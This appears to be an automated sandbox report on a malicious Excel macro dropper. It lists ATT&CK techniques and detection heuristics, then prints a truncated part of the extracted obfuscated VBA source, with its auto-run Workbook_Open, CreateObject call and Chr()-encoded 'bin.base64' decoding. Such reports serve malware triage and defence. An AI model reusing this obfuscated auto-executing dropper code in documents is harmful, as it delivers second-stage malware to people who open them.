Verdict: MALICIOUS
Risk Score: 262
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file is an Excel document containing a Workbook_Open VBA macro. This macro utilizes a Shell() call and CreateObject, indicating it's designed to execute external code. The presence of a long encoded blob and the ClamAV detection name 'Doc.Dropper.Agent-7079636-0' strongly suggest this macro is a dropper for a second-stage payload. No specific family could be identified due to the obfuscation.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-7079636-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-7079636-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14283 bytes |

SHA-256: 160a36a17ac66b6d514bbd2331d230f7cc34ee563a448897f436f52fa8997ff0
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 5 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
atP_h6I16O.tzxGQcCNrimkdtuoZsW3
While 18 = 1759
Dim ETG_w5UEGreP3Di6ajyDSFEBY7q86jP7IUkXqw As Variant
Wend
Dim SVF7F_CUrYJx As Integer
While 1 = 7766
Dim My3Si9MEjzLWHgagFgbJMmPb6U9E8CMQwFUZDyv As Variant
Wend
Dim lIkKcIswiheN As Integer
While 4 = 448
Dim J79jjhZVL9GGgk4iBJ_cPtz_lZvRLhYgawCTw As Variant
Wend
Dim et2mbhlAbn As Integer
While 11 = 1159
Dim NHtWhB8YF88IuGImhjotgiveYFywKL8Hu4CCxB8YxmMxfjE As Variant
Wend
Dim eQ5CZw4SnVM7ZKJ As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "atP_h6I16O"
Dim JeiOQ1rr3yHZ6byIwt8tBuZ_sZJj438UZY9CR96_KKyo7x_JPMX7g6kY_ie1pGx91v_fbvzxw8gy5tB4T9Rod_xdwh As String
Function M39yW1DEyfkN54U78y_SdOHgT1iXpiDgMmYSxqLNaKEfxg8YRXNG(hT6sBHyBQfcNqVUjpbpOupZA_fBh_mXDB9zo7d6F_byqREp2GCJh3NN145seFOBmFXKrfpm)
While 26 = 5820
Dim xRHpDyg1n84rZkR211ZKCCevsfDC9dLnjEKt_Jxo As Variant
Wend
Dim G1LGmuDahitNwKj As Integer
While 17 = 2608
Dim twV6ftc2IuOFSXg1pCtCJzVG7alcXt71Xda7mMP5m8CVWnsB_qCK As Variant
Wend
Dim BGX4ZM8DF9cXwWr As Integer
While 21 = 6825
Dim y7jMauyYLv9tRrjcppuyP_geXNLwndni9 As Variant
Wend
Dim YcjYKqKFZboU As Integer
Dim HED1IvdhjRV_uE7a3qv8HwqwVe5a7EQxnxU5RCndaog_YA4N9OyeFMvUWOcn1Bjd_
Dim nPUC4NYyE2fk9xxg_4W6AjXJOXoyfr1teBV5yQ6MHRwAoT7rrM4K
While 10 = 6686
Dim fevqAhasXDxLhBuqGYuVweDLETlh2Z_5izPGr6 As Variant
Wend
Dim gYcIoTnW1I6d8A As Integer
While 1 = 2221
Dim qQgAahkp531893mqul9K1T3myshrbbkWaC As Variant
Wend
Dim MPRNpIT1djRq As Integer
While 2 = 8078
Dim TutIWRdvHUX3Jr92LaPcf5nUWe5yz_zQTGWw8RDQ2n412XD8I As Variant
Wend
Dim anBSxIXEWv2W As Integer
While 24 = 5645
Dim o6HeEhCSK44V8j2Awc8a7nXTx8e78pieK4KrtUuzAm8gtnTMQVR3wZYAg As Variant
Wend
Dim wpGB_TdSWJCXIPZ As Integer
While 25 = 3456
Dim rGYRpzjIlQokWorudJI7nlw5RcLUbPyGE As Variant
Wend
Dim Jn_FSpKfdtYsEmn As Integer
While 25 = 2695
Dim YhL9Rv_Td_KmNpUbfdedCtVzctFFBehVhpCqkHvD_SeEFC7zHQ As Variant
Wend
Dim NjHjnJVdho8Q As Integer
Set nPUC4NYyE2fk9xxg_4W6AjXJOXoyfr1teBV5yQ6MHRwAoT7rrM4K = CreateObject(JeiOQ1rr3yHZ6byIwt8tBuZ_sZJj438UZY9CR96_KKyo7x_JPMX7g6kY_ie1pGx91v_fbvzxw8gy5tB4T9Rod_xdwh)
While 13 = 5379
Dim ZyDglmzVqaXsNOrZvO7tkSvY_WfNnMXFBeoQ8YLeZeg As Variant
Wend
Dim Hs1Y4mCuX_fV As Integer
While 27 = 5984
Dim ECnaNFkrbBQprjZbVCaSEvmoL8kjja9FeHhNS78XxvDEaJpSL As Variant
Wend
Dim jXUhLOSX8MOdAGA As Integer
While 26 = 7948
Dim BJJiAKGXDBdRrgLBQPV9CmgQ2MyTsq3wnCCP_EQAb9Peq7k1uK8MmG7 As Variant
Wend
Dim Wl2qvUvoUHqnnc As Integer
sb_RDWyxJxgqdVjIhWvcSgkeqxGd18ds4yFTrobZE61_wPxQ4yOEA_lJ1hjNOT6KRxwoNNZ24TWVperY_yjAqXqyK6bHDMIt9nu8cHCnXVJ = Chr(326 - 228) & Chr(497 - 392) & Chr(371 - 261) & Chr(226 - 180) & Chr(150 - 52) & Chr(128 - 31) & Chr(221 - 106) & Chr(480 - 379) & Chr(364 - 310) & Chr(372 - 320)
While 8 = 5463
Dim AJ8UfDVBj5l7igsoHe_nnGXdnoS4V_Q6WyIvNPk2AiPvIWLGlb As Variant
Wend
Dim gGhxP3ubpztboil As Integer
While 26 = 121
... (truncated)